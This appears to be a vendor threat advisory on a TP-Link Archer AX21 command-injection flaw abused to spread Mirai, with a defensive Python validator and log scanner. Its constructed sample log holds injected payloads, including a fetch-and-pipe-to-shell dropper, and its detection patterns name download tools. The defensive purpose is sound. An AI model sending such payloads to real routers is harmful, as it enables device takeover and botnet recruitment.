TP-Link Archer AX-21 Command Injection Attack

Released: May 23, 2023

Updated: Jun 21, 2023


Medium Severity

Routers Platform


Wi-Fi router vulnerability actively exploited

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability (CVE-2023-1389) in the web management interface, specifically in the "Country" field. The field is not sanitized before use, so an attacker who can reach the interface can inject operating-system commands and gain a foothold on the router. The vulnerability has been exploited in the wild to deploy the Mirai botnet.
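The check below is an added example written for this page; it is not FortiGuard or TP-Link code. It shows the two halves of the problem described above: an allow-list validator for the "Country" field (the sanitization the vulnerable firmware lacks), and a scanner that flags HTTP requests whose country parameter carries shell metacharacters or the download-and-run commands typical of Mirai droppers. The access-log lines, the `/cgi-bin/locale` path and the `form`/`operation` parameter names are constructed for the example; the router's real endpoint is not identified on this page.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Allow-list for the field: a country setting is a two-letter uppercase code.
# Validating against this makes metacharacters irrelevant, which is the proper
# fix; stripping known-bad characters alone is fragile.
COUNTRY_RE = re.compile(r"^[A-Z]{2}$")

# Characters an attacker needs to break out of a string that is handed to a
# shell: separators, pipes, redirections, backticks and $(...) / ${...}.
SHELL_META_RE = re.compile(r"[;&|`<>\n]|\$[\(\{]")

# Download-and-execute tokens typical of IoT botnet droppers (Mirai and kin).
DROPPER_RE = re.compile(r"\b(?:wget|curl|tftp|busybox|chmod)\b|/bin/sh|/tmp/", re.I)

# Matches the request line inside a common-log-format entry.
LOG_REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/\d\.\d"')

# Constructed sample log (not captured traffic). 192.0.2.0/24, 198.51.100.0/24
# and 203.0.113.0/24 are documentation ranges. The path and parameter names
# are assumptions for the example.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Apr/2023:10:01:02 +0000] "GET /cgi-bin/locale?form=country&operation=read HTTP/1.1" 200 312
192.0.2.10 - - [27/Apr/2023:10:01:05 +0000] "POST /cgi-bin/locale?form=country&operation=write&country=US HTTP/1.1" 200 44
198.51.100.7 - - [27/Apr/2023:10:02:17 +0000] "POST /cgi-bin/locale?form=country&operation=write&country=%24%28id%29 HTTP/1.1" 200 44
198.51.100.7 - - [27/Apr/2023:10:02:19 +0000] "POST /cgi-bin/locale?form=country&operation=write&country=%24%28wget+http%3A%2F%2F203.0.113.5%2Fbot.sh+-O-%7Csh%29 HTTP/1.1" 200 44
203.0.113.9 - - [27/Apr/2023:10:03:00 +0000] "POST /cgi-bin/locale?form=country&operation=write&country=usa HTTP/1.1" 400 12
"""


def validate_country(value):
    """Hardened handling of the field: accept only an allow-listed code.

    Returns the code unchanged, or raises ValueError for anything else.
    """
    if not isinstance(value, str) or not COUNTRY_RE.fullmatch(value):
        raise ValueError("country must be a two-letter uppercase code")
    return value


def country_param(url):
    """Return the decoded 'country' query value from a URL, or None if absent.

    Splits on '&' only, so an injected ';' inside the value is never mistaken
    for a parameter separator, and decodes twice so a double-encoded payload
    (%2524%2528id%2529) is seen as $(id) rather than as harmless text.
    """
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        if name == "country":
            return unquote_plus(unquote_plus(raw))
    return None


def classify_country(value):
    """'ok' for an allow-listed code, 'injection' when shell metacharacters are
    present, 'suspicious' when malformed but not executable, 'no-country' when
    the parameter is absent."""
    if value is None:
        return "no-country"
    if COUNTRY_RE.fullmatch(value):
        return "ok"
    if SHELL_META_RE.search(value):
        return "injection"
    return "suspicious"


def scan_log(text):
    """Return (line_number, client_ip, verdict, dropper, value) for each request
    whose country parameter is not a clean code. 'dropper' is True when the
    injected value also contains fetch-and-run tooling."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_REQUEST_RE.search(line)
        if not m:
            continue
        value = country_param(m.group(1))
        verdict = classify_country(value)
        if verdict in ("ok", "no-country"):
            continue
        client_ip = line.split(" ", 1)[0]
        findings.append((n, client_ip, verdict, bool(DROPPER_RE.search(value)), value))
    return findings


if __name__ == "__main__":
    for n, ip, verdict, dropper, value in scan_log(SAMPLE_LOG):
        tag = " [dropper]" if dropper else ""
        print(f"line {n}: {ip} {verdict}{tag}: {value!r}")
```

The scanner decides on the decoded value rather than the raw query string, which is why the second sample request (a URL-encoded `$(wget ... | sh)`) is reported as an injection with a dropper, while `usa` is only flagged as malformed. The same allow-list used by `validate_country` is what a fixed firmware should enforce before the value reaches any shell.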

Common Vulnerabilities and Exposures

CVE-2023-1389

Background

TP-Link is one of the global providers of WLAN devices, and the Archer AX21 is a Wi-Fi router that has been abused in attacks to deploy the Mirai botnet. Mirai-based botnets have previously attacked a range of other IoT devices and routers from other brands. In February 2023, FortiGuard Labs released a report on active attacks against vulnerable routers from other vendors, including D-Link, DASAN and Netgear. See Additional Resources for the full report.

Latest Development

Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.


April 27, 2023: TP-Link released a security advisory.
https://www.tp-link.com/us/support/faq/3643/

May 1, 2023: CISA added CVE-2023-1389 to its Known Exploited Vulnerabilities (KEV) catalog.


May 9, 2023: FortiGuard Labs released a Threat Signal report on the vulnerability.
https://www.fortiguard.com/threat-signal-report/5157

FortiGuard Labs has observed active attempts to exploit the TP-Link vulnerability (CVE-2023-1389). Fortinet customers remain protected by the IPS signature. Organizations are advised to check whether their Archer AX21 devices run an affected firmware version (before 1.1.4) and to apply the vendor's patched firmware as soon as possible:
https://www.tp-link.com/ca/support/download/archer-ax21/v3/

FortiGuard Cybersecurity Framework

Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.


PROTECT
  • AV

  • AV (Pre-filter)

  • IPS

DETECT
  • IOC

  • Outbreak Detection

  • Threat Hunting

RESPOND
  • Assisted Response Services

  • Automated Response

RECOVER
  • InfoSec Services

IDENTIFY
  • Attack Surface Monitoring (Inside & Outside)

Threat Intelligence

Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.